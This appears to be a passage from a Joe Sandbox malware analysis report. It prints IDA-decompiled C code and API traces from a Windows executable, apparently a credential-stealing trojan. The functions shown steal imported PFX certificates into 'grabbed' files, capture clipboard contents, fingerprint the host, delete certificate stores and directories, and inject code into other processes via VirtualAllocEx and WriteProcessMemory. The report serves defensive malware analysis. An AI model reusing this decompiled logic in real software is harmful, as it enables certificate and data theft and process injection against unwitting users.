Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: ContextCreateObjectProcessSingleThreadWait$CloseFreeHandleMutexUserVirtual
String ID:
API String ID: 3545650457-0
Opcode ID: 51d9eb225307ef342fe61fb42978b69a208906e100850201617906c75bbfae8d
Instruction ID: 22c5964c75f76a32ce99ff8659c6b43bfff53b47c7aa21cfdb6c2a95c9631159
Opcode Fuzzy Hash: 51d9eb225307ef342fe61fb42978b69a208906e100850201617906c75bbfae8d
Instruction Fuzzy Hash: B5313831500109ABDF219FA5CD49FCA3FA9AF08349F044566F908B22A1C775D950DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B74D, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00410276,00000000,00000000,00000001,F0000040,?,00410276,?,?,?,?,?,00410799,Vixuu), ref: 0040B766
CryptCreateHash.ADVAPI32(00410276,00008003,00000000,00000000,?,?,00410276,?,?,?,?,?,00410799,Vixuu), ref: 0040B77E
CryptHashData.ADVAPI32(?,00000010,00410276,00000000,?,00410276), ref: 0040B799
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000,?,00410276), ref: 0040B7B0
CryptDestroyHash.ADVAPI32(?,?,00410276), ref: 0040B7C7
CryptReleaseContext.ADVAPI32(00410276,00000000,?,00410276,?,?,?,?,?,00410799,Vixuu), ref: 0040B7D1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 796d0a6da0693248184ed497b3ab44bce520321113e16476a0348635df489fa7
Instruction ID: 74d828b2298486b8914bf1cb1418c20473313142c795c3963661a3a888f2bca5
Opcode Fuzzy Hash: 796d0a6da0693248184ed497b3ab44bce520321113e16476a0348635df489fa7
Instruction Fuzzy Hash: 4A11157590024CBFEF128FA4DD88FAE7B7CEB04784F04846AB551B22A0D77689549B28

Uniqueness

Uniqueness Score: -1.00%

Function 00411A9D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00411A9D(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0041028B();
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if(__eflags == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x2000101;
						_t99 = E004102A7(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E004097F7( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E004119E1(_t106, _t111, 2);
									E004119E1(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 > 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E00410354(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_push( &_a4);
								_t64 =  &_v588;
								_push(_t64);
								_push(2);
								L0041595C();
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 > 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E00410354(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0040F810(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E004102A7(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E004102A7(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E004098F9();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E004102A7(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00409921();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E004102A7(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E004102A7(_t111, _t104);
					goto L16;
				}
				_t92 = E00407B82(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E00410354(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E00407CC7( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E00410354(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x00411a9d
0x00411a9d
0x00411aa8
0x00411aaf
0x00411ab1
0x00411ab5
0x00411ab7
0x00411abc
0x00411ac0
0x00000000
0x00411ac2
0x00411ac9
0x00411ac9
0x00411acd
0x00411ad6
0x00411b1f
0x00411b1f
0x00411b23
0x00411b28
0x00411b29
0x00411b2a
0x00411b31
0x00411b34
0x00411b40
0x00411b40
0x00411b42
0x00411b42
0x00411b46
0x00411bbb
0x00411bbb
0x00411bbd
0x00411cbf
0x00411cbf
0x00411cc3
0x00411cc7
0x00411ccc
0x00411ccc
0x00411ccc
0x00411ccf
0x00000000
0x00411ccf
0x00411bc3
0x00411bc7
0x00411c15
0x00411c15
0x00411c17
0x00000000
0x00000000
0x00411c1d
0x00411c21
0x00411ca0
0x00411ca0
0x00411ca2
0x00000000
0x00000000
0x00411ca4
0x00411ca8
0x00411cad
0x00411cb5
0x00411cb5
0x00000000
0x00411ca8
0x00411c31
0x00411c37
0x00411c3a
0x00411c3c
0x00411c3e
0x00411c45
0x00411c4e
0x00411c59
0x00411c59
0x00411c5b
0x00411c62
0x00411c64
0x00000000
0x00411c66
0x00411c69
0x00411c6a
0x00411c70
0x00411c71
0x00411c73
0x00411c78
0x00411c7a
0x00411c7c
0x00411c7f
0x00411c81
0x00411c83
0x00411c8a
0x00411c93
0x00411c9e
0x00411c9e
0x00411c81
0x00000000
0x00411c7a
0x00411c64
0x00411bc9
0x00411bcc
0x00411bd3
0x00411bd7
0x00411bd8
0x00411bdf
0x00411be0
0x00411be5
0x00411be7
0x00411be9
0x00411cbc
0x00000000
0x00411cbc
0x00411bef
0x00411bf8
0x00411bfe
0x00411c02
0x00411c03
0x00411c0a
0x00411c0b
0x00411c10
0x00411c13
0x00000000
0x00411c13
0x00411b48
0x00411b4a
0x00000000
0x00000000
0x00411b55
0x00411b5b
0x00411b5c
0x00411b5d
0x00411b64
0x00411b6c
0x00411b6e
0x00411b70
0x00000000
0x00000000
0x00411b7b
0x00411b81
0x00411b82
0x00411b83
0x00411b8a
0x00411b92
0x00411b94
0x00411b96
0x00000000
0x00000000
0x00411ba2
0x00411ba8
0x00411ba9
0x00411baa
0x00411bb1
0x00411bb9
0x00000000
0x00411bb9
0x00411adf
0x00411aea
0x00411af5
0x00411af7
0x00411af9
0x00000000
0x00000000
0x00411aff
0x00411b04
0x00411b09
0x00411b11
0x00411b19
0x00411b19
0x00411b1b
0x00411b1d
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00411B9C
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,00401458,00000000), ref: 00411BEF

Part of subcall function 0041028B: HeapAlloc.KERNEL32(00000008,00000034,00410651,?,00000000,?), ref: 00410295

GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00401458,00000000), ref: 00411C31
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00411C73

Strings

, xrefs: 00411CA4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: NameUser$AllocCountDefaultFileHeapLanguageModuleTick
String ID:
API String ID: 2013068177-3916222277
Opcode ID: aed2331f763d9b2b691df297bec527ecfe97fb399dd8e0fcde79aa3ab4aa8b32
Instruction ID: 88329fb771c4ab934556611ddd143767eef196a98b56f3cddac79797cd8d865f
Opcode Fuzzy Hash: aed2331f763d9b2b691df297bec527ecfe97fb399dd8e0fcde79aa3ab4aa8b32
Instruction Fuzzy Hash: 5851093168424879D7119B65DC49FDE7BA8AF01344F04405BBA49AF3E2EB799EC4C74C

Uniqueness

Uniqueness Score: -1.00%

Function 0041280F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041280F(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v120;
				struct _SYSTEMTIME _v136;
				intOrPtr _v140;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v160;
				void* __edi;
				void* __esi;
				intOrPtr _t24;
				void* _t31;
				void* _t42;
				void* _t45;
				void* _t49;
				intOrPtr* _t50;
				void* _t51;
				void* _t54;
				intOrPtr* _t55;
				signed int _t58;
				void* _t60;
				void* _t61;

				_t45 = __ecx;
				_t60 = (_t58 & 0xfffffff8) - 0x8c;
				_t24 = E00407B30();
				_t55 = _a4;
				__imp__PFXImportCertStore(_t55, _a8, _a12, _t51, _t54, _t42);
				_v152 = _t24;
				if(_t24 != 0 && (_a12 & 0x10000000) == 0 && _t55 != 0 &&  *_t55 > 0 &&  *((intOrPtr*)(_t55 + 4)) != 0 && E00407B3F() != 0) {
					GetSystemTime( &_v136);
					_push(_v136.wYear & 0x0000ffff);
					_push(_v136.wMonth & 0x0000ffff);
					_push(_v136.wDay & 0x0000ffff);
					_push(L"grabbed");
					_push(L"certs\\%s_%02u_%02u_%04u.pfx");
					_t49 = 0x32;
					_t53 =  &_v120;
					_t31 = E0040A4B7(_v136.wDay & 0x0000ffff, _t49,  &_v120);
					_t61 = _t60 + 0x14;
					if(_t31 > 0 && E0041235A(_t45, _t49, 2, 0,  &_v120,  *((intOrPtr*)(_t55 + 4)),  *_t55) != 0) {
						_t50 = _a8;
						if(_t50 != 0 &&  *_t50 != 0) {
							 *((short*)(E00409833(_t61 + 0x38 + E0040A3AA(_t53) * 2, L".txt", 8) + 8)) = 0;
							_t48 = _t50;
							if(E0040A655(_t36 | 0xffffffff, _t50,  &_v160) != 0) {
								E0041235A(_t48, _t50, 2, 0, _t53, _v148, _v140);
								E0040A645( &_v160);
							}
						}
					}
				}
				return _v152;
			}

0x0041280f
0x00412815
0x0041281e
0x00412826
0x0041282d
0x00412835
0x0041283b
0x00412879
0x00412884
0x0041288a
0x00412890
0x00412891
0x00412896
0x0041289d
0x0041289e
0x004128a2
0x004128a7
0x004128ac
0x004128c2
0x004128c7
0x004128e8
0x004128f3
0x004128fc
0x0041290c
0x00412911
0x00412911
0x004128fc
0x004128c7
0x004128ac
0x00412920

APIs

Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38

PFXImportCertStore.CRYPT32(?,?,?), ref: 0041282D

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

GetSystemTime.KERNEL32(?), ref: 00412879

Strings

grabbed, xrefs: 00412891
.txt, xrefs: 004128D7
certs\%s_%02u_%02u_%04u.pfx, xrefs: 00412896

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: ObjectSingleWait$CertImportStoreSystemTime
String ID: .txt$certs\%s_%02u_%02u_%04u.pfx$grabbed
API String ID: 2161633107-874334855
Opcode ID: ef49be0174f5b543078943167e36c9c70ec30a831aa72ca906ef47f3357dad7c
Instruction ID: 15c35e2aa09bb866fd1f709b01272d2a7378d987854c41c9685648e0f7d4e531
Opcode Fuzzy Hash: ef49be0174f5b543078943167e36c9c70ec30a831aa72ca906ef47f3357dad7c
Instruction Fuzzy Hash: 0621E871A003015FCB20AF598A45ABB73A9BF44354F04452FF994F32D1C7B9D9A4D3AA

Uniqueness

Uniqueness Score: -1.00%

Function 00412C03, Relevance: 7.6, APIs: 5, Instructions: 71
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00412C03(void* _a4) {
				signed int _t12;
				void* _t22;
				void* _t24;
				void* _t25;
				int _t26;

				E00407B30();
				_t26 = _a4;
				_t24 = GetClipboardData(_t26);
				_a4 = _t24;
				if(E00407B3F() == 0) {
					return _t24;
				}
				if(_t24 == 0 || _t26 != 1 && _t26 != 0xd && _t26 != 7) {
					L20:
					return _a4;
				} else {
					_t22 = GlobalLock(_t24);
					if(_t22 == 0) {
						L19:
						goto L20;
					}
					_t12 = _t26 - 1;
					if(_t12 == 0) {
						_push(_t22);
						_push(0);
						L12:
						_t25 = E00409A3C(_t12 | 0xffffffff);
						L15:
						if(_t25 != 0) {
							EnterCriticalSection(0x41aa20);
							E00412923(0x402be8);
							E00412923(_t25);
							LeaveCriticalSection(0x41aa20);
							if(_t25 != _t22) {
								E004097F7(_t25);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t12 = _t12 - 6;
					if(_t12 == 0) {
						_push(_t22);
						_push(1);
						goto L12;
					}
					if(_t12 != 6) {
						_t25 = _a4;
					} else {
						_t25 = _t22;
					}
					goto L15;
				}
			}

0x00412c08
0x00412c0d
0x00412c17
0x00412c19
0x00412c23
0x00000000
0x00412c25
0x00412c2e
0x00412cb6
0x00000000
0x00412c43
0x00412c4b
0x00412c4f
0x00412cb5
0x00000000
0x00412cb5
0x00412c53
0x00412c54
0x00412c73
0x00412c74
0x00412c67
0x00412c6f
0x00412c7b
0x00412c7d
0x00412c85
0x00412c90
0x00412c96
0x00412c9c
0x00412ca4
0x00412ca7
0x00412ca7
0x00412ca4
0x00412caf
0x00000000
0x00412caf
0x00412c56
0x00412c59
0x00412c64
0x00412c65
0x00000000
0x00412c65
0x00412c5e
0x00412c78
0x00412c60
0x00412c60
0x00412c60
0x00000000
0x00412c5e

APIs

Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38

GetClipboardData.USER32 ref: 00412C11

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

GlobalLock.KERNEL32 ref: 00412C45
EnterCriticalSection.KERNEL32(0041AA20,00000000,00000000), ref: 00412C85
LeaveCriticalSection.KERNEL32(0041AA20,00000000,00402BE8), ref: 00412C9C
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00412CAF

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalGlobalObjectSectionSingleWait$ClipboardDataEnterLeaveLockUnlock
String ID:
API String ID: 2045610074-0
Opcode ID: baca8da8304e929a1c2b587d9f64bb99fa7acb3b00013b0dc9e295f864dfc7c9
Instruction ID: 6c3a25e9a7981fa85f9f494552b61879dbff9b9baf82aa9e412f410d6be2a5b9
Opcode Fuzzy Hash: baca8da8304e929a1c2b587d9f64bb99fa7acb3b00013b0dc9e295f864dfc7c9
Instruction Fuzzy Hash: 9011C83250050167C6112F69DB885FF36199B863A4B15003BFB05F7361FABC9DE256DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B41D, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B41D(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0040B635("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040B2FC( &(_v596.cFileName)) == 0 && E0040B635( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0040B1CD( &_v1116);
						} else {
							E0040B41D( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0040b42b
0x0040b43f
0x0040b4ba
0x0040b4c0
0x0040b4d7
0x0040b4d7
0x0040b454
0x0040b459
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b45b
0x0040b45b
0x0040b469
0x0040b481
0x0040b489
0x0040b49b
0x0040b48b
0x0040b48f
0x0040b48f
0x0040b489
0x0040b4af
0x0040b4b4
0x00000000

APIs

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 0040B44E
FindNextFileW.KERNEL32(00000000,?,?,?), ref: 0040B4A9
FindClose.KERNEL32(00000000,?,?), ref: 0040B4B4
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?), ref: 0040B4C0
RemoveDirectoryW.KERNEL32(?,?,?), ref: 0040B4C7

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 136229f666d12f31a5afcace9a987fc733c58848a24caa4ca0d1a8fb158e8ac1
Instruction ID: 75291d6f7ec19cec8aa0513e549dac43e40e3f2ae0e0aeb09e7dcbc294903311
Opcode Fuzzy Hash: 136229f666d12f31a5afcace9a987fc733c58848a24caa4ca0d1a8fb158e8ac1
Instruction Fuzzy Hash: 32118632004248AAC320EB65DD4DADB73ECDF45314F00493FF995E22D1EB7C964586AE

Uniqueness

Uniqueness Score: -1.00%

Function 004127BF, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00402B6C), ref: 004127CA
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004127E3
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,?,00407ED8), ref: 004127EE
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004127F6
CertCloseStore.CRYPT32(00000000,00000000), ref: 00412802

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: 4a69be791d787109f8a23c9fc7be24d0ef96215065c2b7820b912699eabde2e8
Instruction ID: fab364c6def25275bb3281427fc48cef89a3d807a0e0085f1856621d357f98a3
Opcode Fuzzy Hash: 4a69be791d787109f8a23c9fc7be24d0ef96215065c2b7820b912699eabde2e8
Instruction Fuzzy Hash: 52F0E5326812116BC71117356E5CFE7BB6CEB52B61B100123FAA5E32A09EB88890857C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F02D, Relevance: 6.1, APIs: 4, Instructions: 96
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F02D(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t35;
				void** _t39;
				void* _t41;
				intOrPtr* _t42;
				int _t43;
				long _t45;
				void* _t46;
				SIZE_T* _t47;
				signed int _t49;
				void** _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t1 = _t55 + 0x3c; // 0xe0
				_t60 =  *_t1 + __eax;
				_t45 =  *(_t60 + 0x50);
				_v24 = _t45;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t45) == 0) {
					_t35 = VirtualAllocEx(_a4, 0, _t45, 0x3000, 0x40);
					_v12 = _t35;
					__eflags = _t35;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t46 = E0040984A(__eflags, _t55, _t45);
					_t47 = 0;
					__eflags = _t46;
					if(_t46 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t30 =  &_v12;
						 *_t30 = _v12 & 0x00000000;
						__eflags =  *_t30;
						goto L17;
					}
					_t7 = _t60 + 0xa0; // 0x180
					_t39 = _t7;
					__eflags = _t39[1];
					if(_t39[1] <= 0) {
						L15:
						E004097F7(_t46);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t41 =  *_t39;
					__eflags = _t41;
					if(_t41 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t42 = _t41 + _t46;
					while(1) {
						__eflags =  *_t42 - _t47;
						if( *_t42 == _t47) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t42 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t42 = _t42 +  *((intOrPtr*)(_t42 + 4));
							_t47 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t47;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t49 =  *(_t42 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t49;
							if(_t49 > 0) {
								_t52 = (_t49 & 0x00000fff) +  *_t42 + _t46;
								 *_t52 =  *_t52 + _t54 - _v20;
								__eflags =  *_t52;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t43 = WriteProcessMemory(_a4, _v12, _t46, _v24, _t47);
					__eflags = _t43;
					_t26 =  &_v5;
					 *_t26 = _t43 != 0;
					__eflags =  *_t26;
					goto L15;
				}
				return 0;
			}

0x0040f036
0x0040f038
0x0040f03b
0x0040f03d
0x0040f042
0x0040f045
0x0040f051
0x0040f067
0x0040f06d
0x0040f070
0x0040f072
0x0040f128
0x00000000
0x0040f128
0x0040f07f
0x0040f081
0x0040f083
0x0040f085
0x0040f111
0x0040f11e
0x0040f124
0x0040f124
0x0040f124
0x00000000
0x0040f124
0x0040f08b
0x0040f08b
0x0040f091
0x0040f094
0x0040f105
0x0040f106
0x0040f10b
0x0040f10f
0x00000000
0x00000000
0x00000000
0x0040f10f
0x0040f096
0x0040f098
0x0040f09a
0x00000000
0x00000000
0x0040f09c
0x0040f0a4
0x0040f0a6
0x0040f0a9
0x0040f0ea
0x0040f0ea
0x0040f0ec
0x00000000
0x00000000
0x0040f0ad
0x0040f0b0
0x0040f0b3
0x0040f0e5
0x0040f0e5
0x0040f0e8
0x0040f0e8
0x00000000
0x0040f0e8
0x0040f0b8
0x0040f0b8
0x0040f0ba
0x0040f0bd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f0bf
0x0040f0bf
0x0040f0c2
0x0040f0c7
0x0040f0ca
0x0040f0d9
0x0040f0db
0x0040f0db
0x0040f0db
0x0040f0dd
0x0040f0e0
0x0040f0e0
0x00000000
0x0040f0bf
0x0040f0f9
0x0040f0ff
0x0040f101
0x0040f101
0x0040f101
0x00000000
0x0040f101
0x00000000

APIs

IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 0040F049
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,00000000), ref: 0040F067
WriteProcessMemory.KERNEL32(?,?,00000000,00400000,00000000,00400000,?,?,?,00000000), ref: 0040F0F9
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,?,00000000), ref: 0040F11E

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: 84ad69b87decf04be3d46b84e04468c55a7085d49f39b4800930ad0b6f13d16f
Instruction ID: 8074815a5f094fbe943c1ac7a8fddec3e3c8108676363f5637a343672aedc4ac
Opcode Fuzzy Hash: 84ad69b87decf04be3d46b84e04468c55a7085d49f39b4800930ad0b6f13d16f
Instruction Fuzzy Hash: EA31A332A00209AFCB249FA4CC44BAEBBB5EF45715F05807AE501BB6E1C7789D54CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F36F, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F36F(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
